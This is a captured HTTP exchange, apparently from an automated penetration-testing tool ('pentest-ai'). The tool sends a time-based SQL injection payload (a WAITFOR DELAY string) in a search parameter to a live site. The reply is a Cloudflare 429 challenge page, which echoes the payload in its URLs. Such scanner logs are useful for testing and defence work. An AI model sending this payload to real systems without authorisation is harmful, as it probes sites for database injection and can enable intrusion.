REQUEST:
GET https://my.myfirst.tech/search?options[prefix]=1%27%3B%20WAITFOR%20DELAY%20%270%3A0%3A5%27--
User-Agent: pentest-ai/0.11 (+https://pentestai.xyz)



RESPONSE:
HTTP 429
Date: Fri, 17 Jul 2026 09:39:11 GMT
Content-Type: text/html; charset=UTF-8
Content-Length: 9450
Connection: close
Accept-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cf-Mitigated: challenge
X-Frame-Options: SAMEORIGIN
Server: cloudflare
Critical-Ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
Cross-Origin-Embedder-Policy: require-corp
Cross-Origin-Opener-Policy: same-origin
Cross-Origin-Resource-Policy: same-origin
Origin-Agent-Cluster: ?1
Permissions-Policy: accelerometer=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=(),xr-spatial-tracking=*
Referrer-Policy: same-origin
Server-Timing: chlray;desc="a1c8472d9aa1a110"
X-Content-Type-Options: nosniff
Report-To: {"group":"cf-nel","max_age":604800,"endpoints":[{"url":"https://a.nel.cloudflare.com/report/v4?s=CvSFpXRXgmw3d3XtCD%2BoamUdjLOAV1ABwXCMUlRO%2BcdnWfgECvBCmoYJEZVmCmxpUvSpCP8Tf9vuXV7lyBaCxrj4Ims8ygrafOrE3hwubjuebpLTGqw0TXWUK8U8l6yRA1UopvwzWGx31bW41g%3D%3D"}]}
Nel: {"report_to":"cf-nel","success_fraction":0.01,"max_age":604800}
X-XSS-Protection: 1; mode=block
X-Permitted-Cross-Domain-Policies: none
X-Download-Options: noopen
CF-RAY: a1c8472d9aa1a110-SIN
alt-svc: h3=":443"; ma=86400

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
    <title>Verifying your connection...</title>

    <style type="text/css">
        *{box-sizing:border-box;margin:0;padding:0}html{font-family:"Helvetica Neue",Helvetica,Arial,sans-serif;background:#FFF;font-size:62.5%;color:#303030;min-height:100%}body{padding:0;margin:0;line-height:2.7rem}a{color:#303030;border-bottom:1px solid #303030;text-decoration:none;padding-bottom:1rem;transition:border-color 0.2s ease-in}svg{width:40%}a:hover{border-bottom-color:#A9A9A9}h1{font-weight:400;margin:0 0 1.4rem 0}p{font-size:1.5rem;margin:0}.page{padding:4rem 3.5rem;margin:0;display:flex;min-height:100vh;flex-direction:column}.text-container--main{flex:1;display:flex;align-items:start;margin-bottom:1.6rem;margin:auto}.action{border:1px solid #A9A9A9;padding:1.2rem 2.5rem;border-radius:6px;text-decoration:none;margin-top:1.6rem;display:inline-block;font-size:1.5rem;transition:border-color 0.2s ease-in}.action:hover{border-color:#000}@media all and (min-width:500px){.text-container--main{align-items:start}.page{padding:7.5rem 10.5rem}}
    </style>
<meta http-equiv="refresh" content="360"></head>

<body>
  <div class="page">
    <div class="text-container text-container--main">
      <div>
        <h1 data-i18n="content-title">Your connection needs to be verified before you can proceed</h1>
        <div class="cf-injected-html"><div class="main-wrapper" role="main"><div class="main-content"><noscript><div class="h2"><span id="challenge-error-text">Enable JavaScript and cookies to continue</span></div></noscript></div></div><script>(function(){window._cf_chl_opt = {cFPWv: 'b',cH: 'XYrmdS1Y.s7KPgo7dEp70Z.6_t8OuhflVv38iLt1Cqw-1784281151-1.2.1.1-sKephCWJ31vyWwaR60RNUJsNRQafbLCNijQfUWiNG210K8cQbknkwR0YztUrJKAA',cITimeS: '1784281151',cRay: 'a1c8472d9aa1a110',cTplB: '0',cTplC:1,cTplO:0,cTplV:5,cType: 'managed',cUPMDTk:"/search?options%5Bprefix%5D=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_tk=KF62gaearucCBJseppzvczC61Egn5yyjWcDAfqZP7ps-1784281151-1.0.1.1-cjUPdkC_wCjRrextibD2CcnIdfQpjyZQzkiWLv4FHw4",cvId: '3',cZone: 'my.myfirst.tech',fa:"/search?options%5Bprefix%5D=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_f_tk=KF62gaearucCBJseppzvczC61Egn5yyjWcDAfqZP7ps-1784281151-1.0.1.1-cjUPdkC_wCjRrextibD2CcnIdfQpjyZQzkiWLv4FHw4",md: 'kMqpDK8X2cpx9dGci.z459qyNEkF6sJnTGpMpz5avaM-1784281151-1.2.1.1-C_ZmKMb6kZz7ykRXzml_CTJyPY4jzKfSSr99f15mRrJa8Is7QmVhmbEQzRh1PVzN8gPAz7KL9lqA50mSLSVFzAKh0_nZxL6eD.9fRNl_.8Evr72TLnsZNqoRthVdLZsFKWL0yk50.wBPa01TFKB5b6OcL2.yYo0wDkLjjaM4RJdrXRM7LNCCbloFZuZqSeoAY4yZnsd0YkF0nJ_2N3wR4QOSh18jPa_FZVMaS05WkRuLXnlPq3GM50pSGR6hDF0iZmF5gn07bRfQpX1wtRKvdBXpOwdr5dKgTkhaiLUGlHoR.k31r_cUuGdoKdlhiYXgQHFBPFiCzgt1bUBxcF4Nz9lVoirCYI54CFJY8Q_yYo.3cfVvAY3UG3ZZ5yPTIVu1tMDMzJGi.hzmUpUKhdUyxIF_6LnBBEyk6a65VWkwC16WG20UetRh7uOaqPMxrHsb4_tkYD0A0u.78XRlCfhd4SO7CR40qLUSZ3ZU5XA.gYg82K5MYs70FhIhKItpeaif7DXHtbXKXe5MFNKUfYxKiGGO0TVJw6coj81h6pMucNcOj5bCHaZk4xndiBHHyKVUsPwMTb7MRkGFDO.jwXWRYlk8k1bYBe3KfXlbgHFKQrTFo1KYHi935QVp.pyy.CQrsCvK8dEm7o7H_4v7qPbr_cLhMRE.6_26zNelYn4Tm2.kf0HjmCXkOgmm.DFnBGIKX.gJR1eoo5uXgCeq3v6TmKgart4jaeyLpiy2SYei489gP19KLZvaeuT06MGgM74Dz6umQAXD4uhPMEI90SG8X1V6Jl3vD3CtQGTfmdqW4.2rqub04OgAUrT0Xdsj9CLyc9E_CctD6urkCsLELWKO1M9LZcbhs0bkllUc6PsDKHmpuTMeO4RHZgxwc9p0Bam0Ve8fHbU.Gn13nXIA1Ssy_0GjVzbpzWtHGZ_jyr3aLY14t_KnZSvDiypLN5ewAWEm9oCVsAvd.vjNJx5UooZ_TXGlmkCqc8pqfmY0M5OfxBHEt8.FUmYAsmL4SFBr4YBIxCExF4aDbcJAa7Q0LhAVrGVNl3Q8dxhEqmp4KirdauXxRQtr.db78ZkqtT4SbBctEaCGkXB2vN16bIoxiMJOZGaRNCQqF8voRj0ha.wuME5NlnGjfe0ngVcJypleYH9NfP0DnenpDdnzyegcFkxy1J0ELAn6xRgevzLfqHdvKl.isEOfCTkvyLHYRImrgIE7ERZpRpY49.egeBR43.nX8A',mdrd: 'lIBpwyxm58eXYtFlnSveCz1xGJlBAAjUCtQOpItlvH0-1784281151-1.2.1.1-pkHjHguDrEp8W6BE0da03sUCRhsSHfph8TuRDgHCSoFAzVcGBMCP7rDhhl.GfapM_s2WOETNo.MJhtViotK3xvrMwWwk0I.elvjf8gGHTebLr4Ljpt7s4hdvOe5KHDXQhz6IDjbLBrRNKsetB.7jsPzgMOEPzQ27Pf9Amt8RzmX3yY7j3a_YVdm1cpTENASkHMD1LkIv.Byn3eiTc0FzkU7qp2KuKMs_9oL8iNjbjVtH_DwzG.bX0sX85lqZKh3s',};var a = document.createElement('script');a.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/chl_page/v1?ray=a1c8472d9aa1a110';window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;if (window.history && window.history.replaceState) {var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;history.replaceState(null, null,"/search?options%5Bprefix%5D=1%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--\u0026__cf_chl_rt_tk=KF62gaearucCBJseppzvczC61Egn5yyjWcDAfqZP7ps-1784281151-1.0.1.1-cjUPdkC_wCjRrextibD2CcnIdfQpjyZQzkiWLv4FHw4"+ window._cf_chl_opt.cOgUHash);a.onload = function() {history.replaceState(null, null, ogU);}}document.getElementsByTagName('head')[0].appendChild(a);}());</script></div>
      </div>
    </div>
  </div>

  <script>
    var t = {
  "cs": {
    "title": "Vaše připojení se ověřuje...",
    "content-title": "Než budete moct pokračovat, je nutné ověřit vaše připojení"
  },
  "da": {
    "title": "Bekræfter din forbindelse ...",
    "content-title": "Din forbindelse skal bekræftes, før du kan fortsætte"
  },
  "de": {
    "title": "Deine Verbindung wird verifiziert ...",
    "content-title": "Deine Verbindung muss verifiziert werden, bevor du fortfahren kannst"
  },
  "en": {
    "title": "Verifying your connection...",
    "content-title": "Your connection needs to be verified before you can proceed"
  },
  "es": {
    "title": "Verificando la conexión...",
    "content-title": "Se debe verificar tu conexión antes de poder continuar"
  },
  "fi": {
    "title": "Yhteyttäsi todennetaan...",
    "content-title": "Yhteytesi on todennettava ennen kuin voit jatkaa"
  },
  "fr": {
    "title": "Connexion en cours de vérification...",
    "content-title": "Votre connexion doit être vérifiée avant que vous puissiez continuer"
  },
  "hi": {
    "title": "आपका कनेक्शन वेरिफ़ाई हो रहा है...",
    "content-title": "इससे पहले कि आप आगे बढ़ें आपके कनेक्शन को वेरिफ़ाई करना होगा"
  },
  "it": {
    "title": "Verifica connessione...",
    "content-title": "È necessario verificare la tua connessione prima di procedere"
  },
  "ja": {
    "title": "接続を確認しています...",
    "content-title": "続行するには接続の確認が必要です"
  },
  "ko": {
    "title": "연결 확인 중...",
    "content-title": "계속 진행하려면 연결을 확인해야 합니다."
  },
  "ms": {
    "title": "Mengesahkan sambungan anda...",
    "content-title": "Sambungan anda perlu disahkan sebelum anda boleh meneruskan"
  },
  "nb": {
    "title": "Bekreft tilkoblingen din …",
    "content-title": "Tilkoblingen din må bekreftes før du kan fortsette"
  },
  "nl": {
    "title": "Je verbinding verifiëren...",
    "content-title": "Verifieer eerst je verbinding voordat je doorgaat"
  },
  "pl": {
    "title": "Weryfikowanie połączenia...",
    "content-title": "Możesz kontynuować, dopiero gdy połączenie zostanie zweryfikowane"
  },
  "pt-BR": {
    "title": "Verificando a conexão...",
    "content-title": "A conexão precisa ser verificada para você prosseguir"
  },
  "pt-PT": {
    "title": "A verificar a sua ligação...",
    "content-title": "A sua ligação tem de ser verificada antes de prosseguir"
  },
  "sv": {
    "title": "Verifierar din anslutning ...",
    "content-title": "Din anslutning måste verifieras innan du kan fortsätta"
  },
  "th": {
    "title": "ตรวจสอบยืนยันการเชื่อมต่อของคุณ...",
    "content-title": "การเชื่อมต่อของคุณต้องได้รับการตรวจสอบยืนยันก่อนจึงจะดำเนินการต่อได้"
  },
  "tr": {
    "title": "Bağlantınız doğrulanıyor...",
    "content-title": "Devam etmeden önce bağlantınızın doğrulanması gerekir."
  },
  "vi": {
    "title": "Đang xác minh kết nối...",
    "content-title": "Bạn cần xác minh kết nối để có thế tiếp tục"
  },
  "zh-CN": {
    "title": "正在验证您的连接...",
    "content-title": "您的连接需要经过验证然后您才能继续操作"
  },
  "zh-TW": {
    "title": "正在驗證連線...",
    "content-title": "您必須先驗證連線才能繼續"
  }
};
    var language = navigator.languages && navigator.languages[0] || // Chrome / Firefox
      navigator.language ||   // All browsers
      navigator.userLanguage || // IE <= 10
      "en";
    language = language.split("-")[0]; // Strip country code
    translations = t[language] || t["en"];
    // Replace content on screen
    for (var id in translations) {
      target = document.querySelector("[data-i18n=" + id + "]");
      if (target != undefined) {
        target.innerHTML = translations[id];
      }
    }
    // Replace title tage
    document.title = translations["title"];
    // Replace language tag
    if (t[language]) { document.getElementsByTagName('html')[0].setAttribute('lang', language); };
  </script>
</body>
</html>
